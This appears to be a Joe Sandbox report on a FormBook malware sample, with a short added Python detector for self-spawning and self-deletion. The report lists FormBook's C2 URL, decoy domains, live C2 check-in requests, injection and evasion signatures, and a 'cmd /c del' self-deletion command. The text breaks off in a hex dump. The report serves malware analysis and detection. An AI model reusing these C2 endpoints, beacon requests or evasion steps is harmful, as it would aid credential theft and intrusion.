
Windows Analysis Report CtTYTpaAKA.exe

Overview

General Information

Sample Name: CtTYTpaAKA.exe
Analysis ID: 510401
MD5: 4a640b5abfd52dc70eb962bf9f250714
SHA1: 19433ceeaae0f6b678f77e8494a39de9e9d4f870
SHA256: 0e636b89393a1581a2e3f4b141c9886bed9c77969569605cdb44b78d94127802
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • CtTYTpaAKA.exe (PID: 7140 cmdline: 'C:\Users\user\Desktop\CtTYTpaAKA.exe' MD5: 4A640B5ABFD52DC70EB962BF9F250714)
    • CtTYTpaAKA.exe (PID: 5784 cmdline: C:\Users\user\Desktop\CtTYTpaAKA.exe MD5: 4A640B5ABFD52DC70EB962BF9F250714)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 5360 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6600 cmdline: /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
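The process tree above is the host-side evidence behind three of the listed signatures (process hollowing, system process connecting to the network, self deletion via cmd delete), yet no Sigma rule matched. The following is an added example, not part of the Joe Sandbox report: it replays the tree as constructed process-creation events and flags the two chains a detection engineer would want to catch, a process re-launching its own image and a `cmd.exe /c del` aimed at an executable that was itself running. PIDs, images and command lines are taken from the tree; the parent of PID 7140 (set to 0) and the image path of cmd.exe (the tree gives only its MD5) are assumptions.

```python
"""Added example, not part of the Joe Sandbox report: replay the report's
process tree as constructed process-creation events and flag two of the
behaviours the sandbox signatures call out, the sample spawning a second
copy of itself (the launch pattern behind the hollowing verdict) and a
cmd.exe /c del of the sample's own path (self deletion)."""
from dataclasses import dataclass
import ntpath
import re


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path
    cmdline: str


# Constructed from the process tree in the report.  PIDs, images and command
# lines are the ones shown there; parent links follow the tree's nesting.
# Two assumptions: 7140's parent PID (0, unknown) and the cmd.exe image
# path, which the tree gives only as an MD5.  The sandbox draws explorer.exe
# beneath PID 5784 because 5784 injected into it; in EDR telemetry
# explorer.exe keeps its real parent and that edge would have to come from
# an injection event instead.
EVENTS = [
    ProcEvent(7140, 0, r"C:\Users\user\Desktop\CtTYTpaAKA.exe",
              r"'C:\Users\user\Desktop\CtTYTpaAKA.exe'"),
    ProcEvent(5784, 7140, r"C:\Users\user\Desktop\CtTYTpaAKA.exe",
              r"C:\Users\user\Desktop\CtTYTpaAKA.exe"),
    ProcEvent(3352, 5784, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(5360, 3352, r"C:\Windows\SysWOW64\cscript.exe",
              r"C:\Windows\SysWOW64\cscript.exe"),
    ProcEvent(6600, 5360, r"C:\Windows\SysWOW64\cmd.exe",
              r"/c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'"),
    ProcEvent(4816, 6600, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# "del" followed by an optionally quoted absolute Windows path.
DEL_RE = re.compile(r"""\bdel\b\s+['"]?(?P<path>[A-Za-z]:\\[^'"]+?)['"]?\s*$""",
                    re.IGNORECASE)


def ancestry(events, pid):
    """Return the process and its ancestors, nearest first, following ppid."""
    by_pid = {e.pid: e for e in events}
    chain = []
    e = by_pid.get(pid)
    while e is not None:
        chain.append(e)
        e = by_pid.get(e.ppid)
    return chain


def find_self_spawns(events):
    """(parent_pid, child_pid) pairs where a process starts its own image.

    Benign programs rarely re-execute their own binary; a loader doing so
    is the usual prelude to a suspended child that gets hollowed."""
    by_pid = {e.pid: e for e in events}
    return [(e.ppid, e.pid) for e in events
            if e.ppid in by_pid
            and by_pid[e.ppid].image.lower() == e.image.lower()]


def find_self_deletion(events):
    """cmd.exe deleting the image of a process seen in the same event set.

    Matching against every known image, not only the cmd.exe ancestors,
    keeps the rule working when the injection edge is missing from the
    parent chain."""
    images = {}
    for e in events:
        images.setdefault(e.image.lower(), []).append(e.pid)
    hits = []
    for e in events:
        if ntpath.basename(e.image).lower() != "cmd.exe":
            continue
        m = DEL_RE.search(e.cmdline)
        if m and m.group("path").lower() in images:
            chain = [ntpath.basename(a.image) for a in ancestry(events, e.pid)]
            hits.append({"pid": e.pid, "deleted": m.group("path"),
                         "owner_pids": images[m.group("path").lower()],
                         "chain": chain})
    return hits


if __name__ == "__main__":
    print("self-spawn:", find_self_spawns(EVENTS))
    for h in find_self_deletion(EVENTS):
        print("self-delete:", h)
```

On the report's tree the self-spawn check fires on 7140 spawning 5784, and the deletion check ties cmd.exe 6600 back to the sample through cscript.exe and Explorer.EXE. In real telemetry the explorer.exe edge will be absent, which is why the deletion rule keys on "deleted path equals a running image" rather than on ancestry alone.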

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x6ae9:$sqlite3step: 68 34 1C 7B E1
  • 0x6bfc:$sqlite3step: 68 34 1C 7B E1
  • 0x6b18:$sqlite3text: 68 38 2A 90 C5
  • 0x6c3d:$sqlite3text: 68 38 2A 90 C5
  • 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(30 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.CtTYTpaAKA.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.CtTYTpaAKA.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.CtTYTpaAKA.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
  • 0x15d18:$sqlite3text: 68 38 2A 90 C5
  • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
5.0.CtTYTpaAKA.exe.400000.4.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.0.CtTYTpaAKA.exe.400000.4.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(23 further entries not shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

          AV Detection:

Found malware configuration
Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}
Multi AV Scanner detection for submitted file
Source: CtTYTpaAKA.exe | Virustotal: Detection: 13%
Yara detected FormBook
Source: Yara match | File source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY
Source: 5.0.CtTYTpaAKA.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.CtTYTpaAKA.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.CtTYTpaAKA.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.CtTYTpaAKA.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: CtTYTpaAKA.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: CtTYTpaAKA.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP | source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP | source: CtTYTpaAKA.exe, 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: CtTYTpaAKA.exe, cscript.exe
Source: Binary string: cscript.pdb | source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\CtTYTpaAKA.exe | Code function: 4x nop then pop ebx | 5_2_00406AB9
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop ebx | 10_2_00156AB9

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49789 -> 203.170.80.253:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49789 -> 203.170.80.253:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49789 -> 203.170.80.253:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49816 -> 108.167.135.122:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49816 -> 108.167.135.122:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49816 -> 108.167.135.122:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 116.212.126.191:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 116.212.126.191:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 116.212.126.191:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 172.67.216.2 80
Source: C:\Windows\explorer.exe | Domain query: www.rdoi.top
Source: C:\Windows\explorer.exe | Network Connect: 156.240.150.22 80
Source: C:\Windows\explorer.exe | Network Connect: 18.118.119.183 80
Source: C:\Windows\explorer.exe | Domain query: www.isshinn1.com
Source: C:\Windows\explorer.exe | Domain query: www.sosoon.store
Source: C:\Windows\explorer.exe | Domain query: www.24000words.com
Source: C:\Windows\explorer.exe | Domain query: www.creationslazzaroni.com
Source: C:\Windows\explorer.exe | Domain query: www.healthyweekendtips.com
Source: C:\Windows\explorer.exe | Network Connect: 45.93.101.51 80
Source: C:\Windows\explorer.exe | Domain query: www.esyscoloradosprings.com
Source: C:\Windows\explorer.exe | Network Connect: 157.7.107.193 80
Source: C:\Windows\explorer.exe | Domain query: www.passiverewardssystems.com
Source: C:\Windows\explorer.exe | Network Connect: 108.167.135.122 80
Source: C:\Windows\explorer.exe | Network Connect: 203.170.80.253 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 104.233.161.241 80
Source: C:\Windows\explorer.exe | Domain query: www.megacinema.club
Source: C:\Windows\explorer.exe | Domain query: www.thedusi.com
Performs DNS queries to domains with low reputation
Source: DNS query: www.qywyfeo8.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.esyscoloradosprings.com/fqiq/
Source: Joe Sandbox View | ASN Name: INTERQGMOInternetIncJP
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfa HTTP/1.1 | Host: www.isshinn1.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFE HTTP/1.1 | Host: www.rdoi.top | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIg HTTP/1.1 | Host: www.megacinema.club | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFE HTTP/1.1 | Host: www.passiverewardssystems.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw7 HTTP/1.1 | Host: www.sosoon.store | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFE HTTP/1.1 | Host: www.esyscoloradosprings.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFE HTTP/1.1 | Host: www.24000words.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+ HTTP/1.1 | Host: www.healthyweekendtips.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/ HTTP/1.1 | Host: www.thedusi.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View | IP Address: 108.167.135.122
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 17:14:13 GMTContent-Type: text/htmlContent-Length: 19220Connection: closeServer: ApacheLast-Modified: Mon, 23 Jul 2018 06:31:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 
20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6
